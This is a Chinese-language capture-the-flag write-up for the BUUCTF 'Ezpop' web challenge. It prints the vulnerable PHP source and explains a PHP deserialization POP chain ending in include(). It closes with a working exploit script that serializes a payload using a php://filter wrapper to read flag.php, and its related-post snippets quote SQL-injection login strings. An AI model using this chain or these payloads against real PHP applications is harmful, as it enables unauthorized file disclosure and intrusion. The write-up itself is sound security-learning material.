BUUCTF WEB Ezpop

继续简单粗暴的源码审计，看见这么多魔法方法，就知道反序列化没跑了

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {protected  $var;public function append($value){ //$value要可控include($value);}public function __invoke(){$this->append($this->var);}
}class Show{public $source;public $str;public function __construct($file='index.php'){//构造时是index.php$this->source = $file;echo 'Welcome to '.$this->source."<br>";}public function __toString(){return $this->str->source;}public function __wakeup(){if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {//过滤echo "hacker";$this->source = "index.php";}}
}class Test{public $p;public function __construct(){$this->p = array();}public function __get($key){$function = $this->p;return $function();}
}if(isset($_GET['pop'])){@unserialize($_GET['pop']);
}
else{$a=new Show;highlight_file(__FILE__);
}

利用点在include函数里，目标是要调用到Modifier的append函数。
先看一下几个魔法方法的触发方法:
invoke函数：对象本身当成函数执行时，就会回调执行invoke()方法
get函数:在访问获得类中成员变量时触发
wakeup函数:在反序列化时调用
toString函数:类被当成字符串时的回应方法
construct函数:在对象创建时被调用的方法

要调用到Modifier的append函数，需要触发invoke函数，那么反推出Modifier类对象要被当成函数调用，$var是要调用读取的flag文件地址
通过比对，将目标确定在了__get()方法的return值上，如果$function=Modifier，那么就会成功调用到Modifier的invoke方法
同理，我们需要触发__get方法，而Test类里可供选择的只有一个$p,而且是public，那就直接访问就好了。如果我们得到一个Test类->p=Modifier
那么怎么触发这个调用链呢，如果直接序列化一个Test对象，他在反序列化的时候肯定不会自己去调用__get方法
于是继续往前推，看起来触发点是Show类里的__wakeup()方法，我们要通过这个__wakeup()方法让他去触发Test类里的__get方法，怎么触发呢
preg_match的两个比较对象必须都是字符串，如果是类，会自动调用__toString方法，将类转换为字符串。
假设$this->source直接是Test对象，他会直接调用Object的__toString,因为Test对象并没有重写__toString
但是如果$this->source是一个Show对象呢？它会调用自身的__toString，尝试访问$this->str->source。$this->str是一个Test对象的话，
所有调用链都通了

下面正向分析一下：
POP是一个SHOW对象，他反序列化的时候会调用__wakeup方法，他的source属性还是一个show对象，因此在进行preg_match的时候会自动
调用自己重写的to_String方法，那么如果show类的str属性是一个Test()类对象的化，去读取他的source属性是不存在的，从而触发了Test类的
get方法。Test类里的p对象是Modifier对象，因为返回值是一个方法，所以就会触发Modifier对象的invoke方法
那么脚本就很好写了。

<?php
class Modifier {protected  $var='php://filter/read=convert.base64-encode/resource=flag.php' ;}class Show{public $source;public $str;public function __construct($file){$this->source = $file;}public function __toString(){return $this->str->source;}
}class Test{public $p;
}$a = new Show();//a是里层show对象，为了触发toString方法
$a->str = new Test();//利用里层toString里面的source去触发Test类的get方法
$a->str->p = new Modifier();//触发invoke方法
$b = new Show($a);//b是外层show对象
echo urlencode(serialize($b));
?>

参考视频链接:https://www.bilibili.com/video/BV1cD4y1w7Jz/

BUUCTF WEB Ezpop相关推荐

BUUCTF WEB [BJDCTF2020]ZJCTF，不过如此
BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此进入环境后得到源码 <?phperror_reporting(0); $text = $_GET["text&quo ...
BUUCTF Web 极客大挑战 2019 EasySQL
BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号首先有点常识: 正常SQL语句这 ...
BUUCTF WEB [BSidesCF 2020]Had a bad day
BUUCTF WEB [BSidesCF 2020]Had a bad day index.php?category=woofers' 报错 Warning: include(woofers'.php ...
Buuctf -web wp汇总(一)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接持续更新ing~ BuuCTF平台文章目录 BuuCTF平台 [极客大挑战 2019]EasySQL [极 ...
Buuctf -web wp汇总(三)
Buuctf -web wp汇总(一):链接 Buuctf -web wp汇总(二):链接 Buuctf -web wp汇总(三):链接文章目录 [WUSTCTF2020]朴实无华 [WUSTCTF ...
BUUCTF WEB [BJDCTF2020]The mystery of ip
BUUCTF WEB [BJDCTF2020]The mystery of ip 在hint.php中找到一句注释 <!-- Do you know why i know your ip? -- ...
BUUCTF WEB [极客大挑战 2019]LoveSQL
BUUCTF WEB [极客大挑战 2019]LoveSQL 进入靶机后尝试万能密码登录 admin 123' or '1'='1 获得flag Login Success! Hello admin! ...
BUUCTF Web 第二页全部Write ups
更多笔记,可以关注yym68686.top 目录 [强网杯 2019]高明的黑客 [BUUCTF 2018]Online Tool [RoarCTF 2019]Easy Java [GXYCTF201 ...
BUUCTF web(一)
前言:最近参加了一场CTF比赛,菜的一批,接下来多练习web题.MISC.密码学,多思考,提高一下自己做题的思路,以及代码审计.编写脚本的能力. [HCTF 2018]WarmUp 查看源码,发现&l ...
test.php.bak,记一次phpmyadmin 4.8.1 远程文件包含漏洞（BUUCTF web）
题目很简单,一个滑稽打开源码,发现存在source.php文件于是访问文件,发现出现一串php源码提示存在hint.php,于是访问发现一句话 flag not here, and flag i ...

BUUCTF WEB Ezpop

BUUCTF WEB Ezpop相关推荐

最新文章

热门文章